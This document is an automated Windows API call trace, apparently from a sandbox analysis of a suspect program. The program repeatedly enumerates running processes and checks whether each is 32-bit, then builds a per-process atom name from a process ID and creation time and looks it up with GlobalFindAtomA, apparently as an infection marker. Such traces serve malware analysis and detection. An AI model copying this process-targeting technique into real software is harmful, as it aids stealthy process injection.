	[0110.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0110.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0110.134] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.134] CloseHandle (hObject=0x694) returned 1
	[0110.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0110.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0110.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0110.135] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.135] CloseHandle (hObject=0x694) returned 1
	[0110.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0110.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0110.135] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.135] CloseHandle (hObject=0x694) returned 1
	[0110.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0110.135] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.135] CloseHandle (hObject=0x694) returned 1
	[0110.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0110.136] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.136] CloseHandle (hObject=0x694) returned 1
	[0110.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0110.136] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.136] CloseHandle (hObject=0x694) returned 1
	[0110.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0110.136] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.136] CloseHandle (hObject=0x694) returned 1
	[0110.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0110.136] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.136] CloseHandle (hObject=0x694) returned 1
	[0110.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0110.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0110.136] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.137] CloseHandle (hObject=0x694) returned 1
	[0110.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0110.137] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.137] CloseHandle (hObject=0x694) returned 1
	[0110.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0110.137] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.137] CloseHandle (hObject=0x694) returned 1
	[0110.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0110.137] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.137] CloseHandle (hObject=0x694) returned 1
	[0110.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0110.138] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.138] CloseHandle (hObject=0x694) returned 1
	[0110.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0110.138] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.138] CloseHandle (hObject=0x694) returned 1
	[0110.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0110.138] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.138] CloseHandle (hObject=0x694) returned 1
	[0110.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0110.138] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.138] CloseHandle (hObject=0x694) returned 1
	[0110.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0110.139] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.139] CloseHandle (hObject=0x694) returned 1
	[0110.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0110.139] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.139] CloseHandle (hObject=0x694) returned 1
	[0110.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0110.139] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.139] CloseHandle (hObject=0x694) returned 1
	[0110.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0110.139] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.139] CloseHandle (hObject=0x694) returned 1
	[0110.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0110.139] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.139] CloseHandle (hObject=0x694) returned 1
	[0110.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0110.140] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.140] CloseHandle (hObject=0x694) returned 1
	[0110.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0110.140] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.140] CloseHandle (hObject=0x694) returned 1
	[0110.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0110.140] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.140] CloseHandle (hObject=0x694) returned 1
	[0110.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0110.140] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.140] CloseHandle (hObject=0x694) returned 1
	[0110.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0110.140] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.140] CloseHandle (hObject=0x694) returned 1
	[0110.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0110.141] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.141] CloseHandle (hObject=0x694) returned 1
	[0110.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0110.141] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.141] CloseHandle (hObject=0x694) returned 1
	[0110.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0110.141] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.141] CloseHandle (hObject=0x694) returned 1
	[0110.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0110.141] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.141] CloseHandle (hObject=0x694) returned 1
	[0110.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.141] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.141] CloseHandle (hObject=0x694) returned 1
	[0110.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.142] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.142] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0110.142] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0110.142] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0110.143] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.143] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0110.143] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.143] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0110.143] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0110.143] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0110.217] CloseHandle (hObject=0x694) returned 1
	[0110.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0110.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0110.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.217] CloseHandle (hObject=0x694) returned 1
	[0110.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0110.217] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.217] CloseHandle (hObject=0x694) returned 1
	[0110.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0110.222] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.222] CloseHandle (hObject=0x694) returned 1
	[0110.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0110.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0110.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0110.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0110.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0110.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0110.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0110.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0110.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0110.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0110.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0110.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0110.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0110.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0110.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0110.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0110.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0110.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0110.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0110.289] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.289] CloseHandle (hObject=0x694) returned 1
	[0110.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0110.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0110.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0110.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.290] CloseHandle (hObject=0x694) returned 1
	[0110.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0110.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0110.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.290] CloseHandle (hObject=0x694) returned 1
	[0110.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0110.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.290] CloseHandle (hObject=0x694) returned 1
	[0110.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0110.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.290] CloseHandle (hObject=0x694) returned 1
	[0110.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0110.290] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.291] CloseHandle (hObject=0x694) returned 1
	[0110.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0110.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.291] CloseHandle (hObject=0x694) returned 1
	[0110.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0110.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.291] CloseHandle (hObject=0x694) returned 1
	[0110.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0110.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0110.291] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.291] CloseHandle (hObject=0x694) returned 1
	[0110.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0110.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.292] CloseHandle (hObject=0x694) returned 1
	[0110.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0110.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.292] CloseHandle (hObject=0x694) returned 1
	[0110.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0110.292] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.292] CloseHandle (hObject=0x694) returned 1
	[0110.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0110.294] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.294] CloseHandle (hObject=0x694) returned 1
	[0110.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0110.294] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.294] CloseHandle (hObject=0x694) returned 1
	[0110.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0110.294] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.294] CloseHandle (hObject=0x694) returned 1
	[0110.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0110.294] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.294] CloseHandle (hObject=0x694) returned 1
	[0110.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0110.294] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.294] CloseHandle (hObject=0x694) returned 1
	[0110.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0110.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.295] CloseHandle (hObject=0x694) returned 1
	[0110.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0110.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.295] CloseHandle (hObject=0x694) returned 1
	[0110.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0110.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.295] CloseHandle (hObject=0x694) returned 1
	[0110.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0110.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.295] CloseHandle (hObject=0x694) returned 1
	[0110.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0110.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.295] CloseHandle (hObject=0x694) returned 1
	[0110.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0110.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.296] CloseHandle (hObject=0x694) returned 1
	[0110.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0110.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.296] CloseHandle (hObject=0x694) returned 1
	[0110.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0110.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.296] CloseHandle (hObject=0x694) returned 1
	[0110.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0110.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.296] CloseHandle (hObject=0x694) returned 1
	[0110.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0110.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.297] CloseHandle (hObject=0x694) returned 1
	[0110.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0110.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.297] CloseHandle (hObject=0x694) returned 1
	[0110.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0110.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.297] CloseHandle (hObject=0x694) returned 1
	[0110.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0110.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.297] CloseHandle (hObject=0x694) returned 1
	[0110.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.297] CloseHandle (hObject=0x694) returned 1
	[0110.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.304] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0110.304] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0110.304] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0110.305] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.305] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0110.305] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.305] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0110.305] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0110.305] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0110.305] CloseHandle (hObject=0x694) returned 1
	[0110.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0110.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0110.306] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.306] CloseHandle (hObject=0x694) returned 1
	[0110.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0110.306] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.306] CloseHandle (hObject=0x694) returned 1
	[0110.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0110.306] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.306] CloseHandle (hObject=0x694) returned 1
	[0110.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0110.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0110.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0110.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0110.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0110.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0110.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0110.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0110.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0110.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0110.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0110.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0110.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0110.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0110.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0110.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0110.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0110.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0110.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0110.423] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.423] CloseHandle (hObject=0x694) returned 1
	[0110.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0110.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0110.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0110.424] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.424] CloseHandle (hObject=0x694) returned 1
	[0110.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0110.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0110.424] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.424] CloseHandle (hObject=0x694) returned 1
	[0110.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0110.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.425] CloseHandle (hObject=0x694) returned 1
	[0110.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0110.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.425] CloseHandle (hObject=0x694) returned 1
	[0110.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0110.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
